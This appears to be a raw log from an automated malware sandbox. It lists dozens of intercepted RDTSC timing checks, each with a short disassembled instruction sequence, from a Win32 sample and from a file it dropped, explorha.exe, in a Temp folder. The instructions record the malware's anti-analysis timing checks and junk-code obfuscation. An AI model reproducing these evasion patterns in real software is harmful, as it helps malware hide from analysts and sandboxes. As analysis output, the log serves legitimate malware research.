Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708F3 second address: 51708F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708F9 second address: 51708FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708FD second address: 5170911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC7A6627AFFh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170911 second address: 5170917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170917 second address: 5170952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FC734882080h 0x00000015 mov ecx, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov bx, B2C0h 0x0000001e mov di, 3AECh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170952 second address: 51709DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 0D97h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC7A6C051BDh 0x00000010 pushad 0x00000011 call 00007FC734E5F77Fh 0x00000016 mov bx, si 0x00000019 pop eax 0x0000001a pushad 0x0000001b mov dx, E176h 0x0000001f push edi 0x00000020 pop eax 0x00000021 popad 0x00000022 popad 0x00000023 test byte ptr [76FA6968h], 00000002h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FC734E5F77Fh 0x00000031 xor eax, 64ED01FEh 0x00000037 jmp 00007FC734E5F789h 0x0000003c popfd 0x0000003d mov esi, 03759647h 0x00000042 popad 0x00000043 jne 00007FC7A6C0516Fh 0x00000049 pushad 0x0000004a mov eax, 5179073Fh 0x0000004f movzx eax, bx 0x00000052 popad 0x00000053 mov edx, dword ptr [ebp+0Ch] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC734E5F77Ah 0x0000005d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51709DC second address: 5170A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC734882085h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170A03 second address: 5170A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC734E5F781h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov ax, 2383h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC734E5F786h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170A48 second address: 5170A55 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170A55 second address: 5170A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC734E5F77Fh 0x0000000a sub si, E98Eh 0x0000000f jmp 00007FC734E5F789h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170A89 second address: 5170AAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170AAD second address: 5170AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170AB3 second address: 5170AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170AB7 second address: 5170AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FC734E5F77Ah 0x00000015 sub cx, F198h 0x0000001a jmp 00007FC734E5F77Bh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170AEA second address: 5170B29 instructions: 0x00000000 rdtsc 0x00000002 mov bl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, edx 0x00000008 popad 0x00000009 push dword ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FC734882086h 0x00000017 jmp 00007FC734882085h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170B69 second address: 5170BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov cl, 3Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FC734E5F77Fh 0x00000015 jmp 00007FC734E5F783h 0x0000001a popfd 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170BB0 second address: 5170BF5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC734882088h 0x00000008 adc eax, 21024F08h 0x0000000e jmp 00007FC73488207Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC734882080h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170BF5 second address: 5170BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170BFB second address: 5170C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC73488207Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170C0C second address: 5170C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180A7B second address: 5180A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180A80 second address: 5180AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC734E5F77Eh 0x0000000d mov ebp, esp 0x0000000f jmp 00007FC734E5F780h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180AAF second address: 5180AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180AB5 second address: 5180AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5200725 second address: 5200729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5200729 second address: 520072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 520072D second address: 5200733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F08FB second address: 51F092D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov eax, 5BC62463h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FC734E5F789h 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dh, 5Bh 0x0000001a mov di, cx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F092D second address: 51F0953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC73488207Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0770 second address: 51F0786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0786 second address: 51F07A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F07A1 second address: 51F07B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F784h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F07B9 second address: 51F07BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F07BD second address: 51F0854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, bx 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov edx, 7FC2EC24h 0x00000017 pushfd 0x00000018 jmp 00007FC734E5F77Dh 0x0000001d sbb cl, 00000066h 0x00000020 jmp 00007FC734E5F781h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FC734E5F783h 0x00000032 sbb si, E59Eh 0x00000037 jmp 00007FC734E5F789h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FC734E5F780h 0x00000043 sub esi, 390B9F98h 0x00000049 jmp 00007FC734E5F77Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0854 second address: 51F0881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190094 second address: 51900B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51900B1 second address: 5190129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 8Dh 0x00000005 pushfd 0x00000006 jmp 00007FC734882088h 0x0000000b sub ax, D908h 0x00000010 jmp 00007FC73488207Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FC734882086h 0x0000001f push eax 0x00000020 pushad 0x00000021 mov bx, E614h 0x00000025 mov ax, bx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov edi, ecx 0x0000002f pushfd 0x00000030 jmp 00007FC73488207Ch 0x00000035 or si, CDC8h 0x0000003a jmp 00007FC73488207Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190129 second address: 519014B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 3Bh 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FC734E5F77Fh 0x00000014 pop ecx 0x00000015 mov bh, 1Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 519014B second address: 5190197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC734882081h 0x00000009 sub cx, 7046h 0x0000000e jmp 00007FC734882081h 0x00000013 popfd 0x00000014 mov si, CAF7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC734882084h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190197 second address: 519019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 519019B second address: 51901A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51901A1 second address: 51901A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51901A7 second address: 51901AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0BF4 second address: 51F0C8F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC734E5F77Dh 0x00000008 add ecx, 21777E36h 0x0000000e jmp 00007FC734E5F781h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC734E5F77Ch 0x00000021 or cx, 5D58h 0x00000026 jmp 00007FC734E5F77Bh 0x0000002b popfd 0x0000002c call 00007FC734E5F788h 0x00000031 push esi 0x00000032 pop edx 0x00000033 pop esi 0x00000034 popad 0x00000035 push dword ptr [ebp+08h] 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d push 01C0D903h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FC734E5F789h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0C8F second address: 51F0C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0C93 second address: 51F0C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0C99 second address: 51F0CC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 call 00007FC73488207Fh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 01C1D901h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov di, cx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0D73 second address: 51F0D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51F0D82 second address: 51F0D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882084h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D62D6 second address: 8D62DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D62DE second address: 8D62E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D62E3 second address: 8D62E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D62E9 second address: 8D62ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E484F second address: 8E4855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4855 second address: 8E485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4B36 second address: 8E4B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4B4B second address: 8E4B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4B51 second address: 8E4B7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FC734E5F776h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FC734E5F781h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC734E5F77Dh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CB5 second address: 8E4CBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CBB second address: 8E4CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CC1 second address: 8E4CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CC8 second address: 8E4CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC734E5F781h 0x0000000f jnc 00007FC734E5F776h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CE9 second address: 8E4CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4CED second address: 8E4CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4E39 second address: 8E4E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734882085h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4E52 second address: 8E4E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E4E56 second address: 8E4E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jp 00007FC734882076h 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7781 second address: 8E77B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+124490C3h], edx 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1CBDh], ebx 0x00000018 push 2C73CFFEh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC734E5F785h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E77B5 second address: 8E782D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2C73CF7Eh 0x00000010 mov edi, eax 0x00000012 push 00000003h 0x00000014 adc ecx, 7FD27F96h 0x0000001a push 00000000h 0x0000001c jl 00007FC73488207Ch 0x00000022 sub dword ptr [ebp+122D1C81h], esi 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D3AB2h] 0x00000030 call 00007FC734882079h 0x00000035 jg 00007FC734882088h 0x0000003b jmp 00007FC734882082h 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC734882084h 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E782D second address: 8E7842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jbe 00007FC734E5F776h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7842 second address: 8E787E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FC734882076h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jp 00007FC73488208Ch 0x00000014 jmp 00007FC734882086h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007FC73488207Ch 0x00000025 jng 00007FC734882076h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E796C second address: 8E7970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
